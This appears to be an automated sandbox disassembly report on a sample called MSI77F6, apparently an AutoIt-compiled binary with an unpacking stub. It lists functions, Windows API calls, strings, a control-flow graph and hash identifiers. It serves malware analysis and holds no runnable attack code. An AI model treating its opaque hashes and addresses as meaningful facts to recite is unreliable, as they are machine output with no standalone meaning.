                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                        • String ID:
                                        • API String ID: 1240663315-0
                                        • Opcode ID: b389cd2e07db0f87bffd29e9b3a8be696dc6b891b79bb1dfd98083c6d54b5607
                                        • Instruction ID: bdef3b897a1788dc5c26e251dea80c3318b864b83de1d7df913f546b6f75eef5
                                        • Opcode Fuzzy Hash: b389cd2e07db0f87bffd29e9b3a8be696dc6b891b79bb1dfd98083c6d54b5607
                                        • Instruction Fuzzy Hash: 61E14A71204201EFCB15DF28C995E2ABBF9EF89354B04856EF44ADB361DA39ED01CB52
                                        Function 007729C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1278 7729c2-7729e2 1280 7729e4-7729e7 1278->1280 1281 772a42-772a44 1278->1281 1283 7729e9-7729f0 1280->1283 1284 772a48 1280->1284 1281->1280 1282 772a46 1281->1282 1285 772a2b-772a33 NtdllDefWindowProc_W 1282->1285 1288 7729f6-7729fb 1283->1288 1289 772aac-772ab4 PostQuitMessage 1283->1289 1286 7e2307-7e2335 call 77322e call 78ec33 1284->1286 1287 772a4e-772a51 1284->1287 1290 772a39-772a3f 1285->1290 1321 7e233a-7e2341 1286->1321 1291 772a76-772a9d SetTimer RegisterClipboardFormatW 1287->1291 1292 772a53-772a54 1287->1292 1294 7e238f-7e23a3 call 7b57fb 1288->1294 1295 772a01-772a03 1288->1295 1296 772a72-772a74 1289->1296 1291->1296 1300 772a9f-772aaa CreatePopupMenu 1291->1300 1297 7e22aa-7e22ad 1292->1297 1298 772a5a-772a6d KillTimer call 772b94 call 772ac7 1292->1298 1294->1296 1312 7e23a9 1294->1312 1301 772ab6-772ac0 call 771e58 1295->1301 1302 772a09-772a0e 1295->1302 1296->1290 1305 7e22af-7e22b1 1297->1305 1306 7e22e3-7e2302 MoveWindow 1297->1306 1298->1296 1300->1296 1313 772ac5 1301->1313 1309 772a14-772a19 1302->1309 1310 7e2374-7e237b 1302->1310 1314 7e22d2-7e22de SetFocus 1305->1314 1315 7e22b3-7e22b6 1305->1315 1306->1296 1319 7e235f-7e236f call 7b5fdb 1309->1319 1320 772a1f-772a25 1309->1320 1310->1285 1317 7e2381-7e238a call 7ab31f 1310->1317 1312->1285 1313->1296 1314->1296 1315->1320 1322 7e22bc-7e22cd call 77322e 1315->1322 1317->1285 1319->1296 1320->1285 1320->1321 1321->1285 1326 7e2347-7e235a call 772b94 call 773598 1321->1326 1322->1296 1326->1285
                                        APIs
                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00772A33
                                        • KillTimer.USER32(?,00000001), ref: 00772A5D
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00772A80
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00772A8B
                                        • CreatePopupMenu.USER32 ref: 00772A9F
                                        • PostQuitMessage.USER32(00000000), ref: 00772AAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                        • String ID: TaskbarCreated
                                        • API String ID: 157504867-2362178303
                                        • Opcode ID: 0196c12848ddab986c5e66482068eab54b918b92144110ab0e834dc5702144c0
                                        • Instruction ID: fdc5fa2c43d3d33d3df968bffd04e3c7f1e02a741a41575bb0b039c47f49de2b
                                        • Opcode Fuzzy Hash: 0196c12848ddab986c5e66482068eab54b918b92144110ab0e834dc5702144c0
                                        • Instruction Fuzzy Hash: D64158302102459BDF346F64AC0DBB9375AF7987C0F01C525FA29D62A3DA2C8C42D769
                                        Function 0078E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 0078E4A7
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • GetCurrentProcess.KERNEL32(00000000,0080DC28,?,?), ref: 0078E567
                                        • GetNativeSystemInfo.KERNEL32(?,0080DC28,?,?), ref: 0078E5BC
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0078E5C7
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0078E5DA
                                        • GetSystemInfo.KERNEL32(?,0080DC28,?,?), ref: 0078E5E4
                                        • GetSystemInfo.KERNEL32(?,0080DC28,?,?), ref: 0078E5F0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                        • String ID:
                                        • API String ID: 2717633055-0
                                        • Opcode ID: cfa7b8a4f1b789f9502497403565eaa0194b787b809606dc5eb36051929f4de2
                                        • Instruction ID: f528be9f7c6ff968e7373847bf06f0daf46ad5f8a298c4322b65761f78d56bb8
                                        • Opcode Fuzzy Hash: cfa7b8a4f1b789f9502497403565eaa0194b787b809606dc5eb36051929f4de2
                                        • Instruction Fuzzy Hash: 2361D2B180A3C4CFCF15DF6898C15E97FB56F2A308F2985D9D8449B20BD728C909CB66
                                        Function 007731F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00773202
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00773219
                                        • LoadResource.KERNEL32(?,00000000), ref: 007E57D7
                                        • SizeofResource.KERNEL32(?,00000000), ref: 007E57EC
                                        • LockResource.KERNEL32(?), ref: 007E57FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT
                                        • API String ID: 3051347437-3967369404
                                        • Opcode ID: f865215dbdb79d43657a22739828a07f3505d5b8fa5e04473e07ebb6dcebd8d7
                                        • Instruction ID: 00141475c92b30cd6812c26ac48e4d2cabe6a088c284aad3e6c30dcaafb2d69a
                                        • Opcode Fuzzy Hash: f865215dbdb79d43657a22739828a07f3505d5b8fa5e04473e07ebb6dcebd8d7
                                        • Instruction Fuzzy Hash: 7B117C70200701BFEB218B65EC48F277BBAFBC9B91F20C028B41686250DB75DD00EA60
                                        Function 007B6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007B6F7D
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007B6F8D
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 007B6FAC
                                        • __wsplitpath.LIBCMT ref: 007B6FD0
                                        • _wcscat.LIBCMT ref: 007B6FE3
                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007B7022
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                        • String ID:
                                        • API String ID: 1605983538-0
                                        • Opcode ID: 8bab421a9d986540a4c0d73d77f9b3e224e8524687f7642d7b62c4dae87adb4f
                                        • Instruction ID: 9204824e1935c4d5cdbf88c5ecad8d64cb021565a2b4f2b0f18040f5d05cd298
                                        • Opcode Fuzzy Hash: 8bab421a9d986540a4c0d73d77f9b3e224e8524687f7642d7b62c4dae87adb4f
                                        • Instruction Fuzzy Hash: 05216571904219AFDB21BBA4DC88BEEB7BDAB49300F5004A6F505E3141E779AF84DB61
                                        Function 008DA0C0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(?), ref: 008DA1FA
                                        • GetProcAddress.KERNEL32(?,008D3FF9), ref: 008DA218
                                        • ExitProcess.KERNEL32(?,008D3FF9), ref: 008DA229
                                        • VirtualProtect.KERNEL32(00770000,00001000,00000004,?,00000000), ref: 008DA277
                                        • VirtualProtect.KERNEL32(00770000,00001000), ref: 008DA28C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                        • String ID:
                                        • API String ID: 1996367037-0
                                        • Opcode ID: 94a05728a56d74d319edfe88f62394ca56f17f0f32e9801dab96c6c72d6bf155
                                        • Instruction ID: 87745901befbbcb05a48b5abee2ed2b3f32241a4050d5ccf72a2d0979a94cf5d
                                        • Opcode Fuzzy Hash: 94a05728a56d74d319edfe88f62394ca56f17f0f32e9801dab96c6c72d6bf155
                                        • Instruction Fuzzy Hash: 8B510772A446564ADB299EB8CCC0660B7A4FB52324F38073AC5F3C73C5F7A45C0993A2
                                        Function 007BEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007B78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 007B78CB
                                        • CoInitialize.OLE32(00000000), ref: 007BF04D
                                        • CoCreateInstance.COMBASE(007FDA7C,00000000,00000001,007FD8EC,?), ref: 007BF066
                                        • CoUninitialize.COMBASE ref: 007BF083
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                        • String ID: .lnk
                                        • API String ID: 2126378814-24824748
                                        • Opcode ID: b6043a3c7ce27b8b75778ef0b24a479c5dd92c9c1d38d92671900d27e4d7b459
                                        • Instruction ID: 0b5df6fb434d5ade033bc6424e22cbe2743a90180334d3ab86666c25d42a9a79
                                        • Opcode Fuzzy Hash: b6043a3c7ce27b8b75778ef0b24a479c5dd92c9c1d38d92671900d27e4d7b459
                                        • Instruction Fuzzy Hash: BDA14675604305EFCB10EF14C888E5ABBE5BF88720F148958F8999B361CB39ED45CB92
                                        Function 00782B40 Relevance: 6.6, APIs: 2, Strings: 1, Instructions: 1382COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0079010A: std::exception::exception.LIBCMT ref: 0079013E
                                          • Part of subcall function 0079010A: __CxxThrowException@8.LIBCMT ref: 00790153
                                        • _memmove.LIBCMT ref: 00782C63
                                        • _memmove.LIBCMT ref: 0078303A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                        • String ID: @
                                        • API String ID: 1300846289-2766056989
                                        • Opcode ID: 9c1c192028662ce6e10a81ef34aaf915e7a55a0fb76cdac8bd0d018c329c611a
                                        • Instruction ID: f9f363ef263d9769b4047d7d49d6ea82477b23deee8ecc57303d73976f649872
                                        • Opcode Fuzzy Hash: 9c1c192028662ce6e10a81ef34aaf915e7a55a0fb76cdac8bd0d018c329c611a
                                        • Instruction Fuzzy Hash: 8DC2A274A40249DFCF24EF99C884AADB7B1FF48710F248459E909AB351D739ED42CB91
                                        Function 0077DCD0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 540COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: G-w
                                        • API String ID: 0-1692400679
                                        • Opcode ID: e2fd571903ed14ff4d866a7eacafd19e9899b872e555f0b0e5041152f9900aaf
                                        • Instruction ID: fa324f7f22d9998167bf894938b1b05c24dd6dc2a265c36ea6c9fcd7c3d7ffda
                                        • Opcode Fuzzy Hash: e2fd571903ed14ff4d866a7eacafd19e9899b872e555f0b0e5041152f9900aaf
                                        • Instruction Fuzzy Hash: 59229E70A00209DFDF24DF58C494AAAB7F0FF19340F24C1A9E85A9B351E779AD85CB91
                                        Function 0078DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNEL32(0077C848,0077C848), ref: 0078DDA2
                                        • FindFirstFileW.KERNEL32(0077C848,?), ref: 007E4A83
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: File$AttributesFindFirst
                                        • String ID:
                                        • API String ID: 4185537391-0
                                        • Opcode ID: 1957dcda86be08314201b9c5941a7cb3409bb294ef8231ec6add6c18d28e09a2
                                        • Instruction ID: 1b624952362301d44782cb46ce67517ca74e726852cf384052dbba1b0d2b7843
                                        • Opcode Fuzzy Hash: 1957dcda86be08314201b9c5941a7cb3409bb294ef8231ec6add6c18d28e09a2
                                        • Instruction Fuzzy Hash: B7E0D831415405678234773CEC0D8F9375D9B09338B104715F935C10E0E778AD50C6EA
                                        Function 00783680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID:
                                        • API String ID: 3964851224-0
                                        • Opcode ID: 0bb89b2fa8db8f73ace8a1e1969865ea0ccca327a1ca026a021c0d298f425cb5
                                        • Instruction ID: dfc39b1848d43189daecc556be424deb22aa346e5ca8bb09c8ca55566743bc69
                                        • Opcode Fuzzy Hash: 0bb89b2fa8db8f73ace8a1e1969865ea0ccca327a1ca026a021c0d298f425cb5
                                        • Instruction Fuzzy Hash: D2926A70648341DFD724EF18C484B6AB7F0BF88704F14885DE98A8B2A2D779ED45CB92
                                        Function 007EC146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        • Opcode ID: dd936a7563db0d66478691ae193265b203cdfda5b9f2044eaceaaf864b1fdf53
                                        • Instruction ID: 00af83a8ca0f155fbe7631e65f68361213eaf7210b4734ad0e4a9f0fc4ad3d54
                                        • Opcode Fuzzy Hash: dd936a7563db0d66478691ae193265b203cdfda5b9f2044eaceaaf864b1fdf53
                                        • Instruction Fuzzy Hash: A1C04CB140500DEFCB15CB80D9859EFB7BCBB08300F208095A115E1000D7749B459B75
                                        Function 0077E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077E279
                                        • timeGetTime.WINMM ref: 0077E51A
                                        • TranslateMessage.USER32(?), ref: 0077E646
                                        • DispatchMessageW.USER32(?), ref: 0077E651
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077E664
                                        • LockWindowUpdate.USER32(00000000), ref: 0077E697
                                        • DestroyWindow.USER32 ref: 0077E6A3
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0077E6BD
                                        • Sleep.KERNEL32(0000000A), ref: 007E5B15
                                        • TranslateMessage.USER32(?), ref: 007E62AF
                                        • DispatchMessageW.USER32(?), ref: 007E62BD
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007E62D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                        • API String ID: 2641332412-570651680
                                        • Opcode ID: f892e7287d93d7db6304c0060a9edc30c6123c4018f8e49ad71bcdb123f151fe
                                        • Instruction ID: 9f3f35cf3803c3d365c81209c79807e4456a24a440e3dc88e74b6a4842e39340
                                        • Opcode Fuzzy Hash: f892e7287d93d7db6304c0060a9edc30c6123c4018f8e49ad71bcdb123f151fe
                                        • Instruction Fuzzy Hash: EF62A270504384DFDB24DF24C899BAA77E5BF48348F1489BDF9498B292DB78D844CB62
                                        Function 007A6A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___createFile.LIBCMT ref: 007A6C73
                                        • ___createFile.LIBCMT ref: 007A6CB4
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 007A6CDD
                                        • __dosmaperr.LIBCMT ref: 007A6CE4
                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007A6CF7
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 007A6D1A
                                        • __dosmaperr.LIBCMT ref: 007A6D23
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007A6D2C
                                        • __set_osfhnd.LIBCMT ref: 007A6D5C
                                        • __lseeki64_nolock.LIBCMT ref: 007A6DC6
                                        • __close_nolock.LIBCMT ref: 007A6DEC
                                        • __chsize_nolock.LIBCMT ref: 007A6E1C
                                        • __lseeki64_nolock.LIBCMT ref: 007A6E2E
                                        • __lseeki64_nolock.LIBCMT ref: 007A6F26
                                        • __lseeki64_nolock.LIBCMT ref: 007A6F3B
                                        • __close_nolock.LIBCMT ref: 007A6F9B
                                          • Part of subcall function 0079F84C: CloseHandle.KERNEL32(00000000,0081EEC4,00000000,?,007A6DF1,0081EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0079F89C
                                          • Part of subcall function 0079F84C: GetLastError.KERNEL32(?,007A6DF1,0081EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0079F8A6
                                          • Part of subcall function 0079F84C: __free_osfhnd.LIBCMT ref: 0079F8B3
                                          • Part of subcall function 0079F84C: __dosmaperr.LIBCMT ref: 0079F8D5
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        • __lseeki64_nolock.LIBCMT ref: 007A6FBD
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007A70F2
                                        • ___createFile.LIBCMT ref: 007A7111
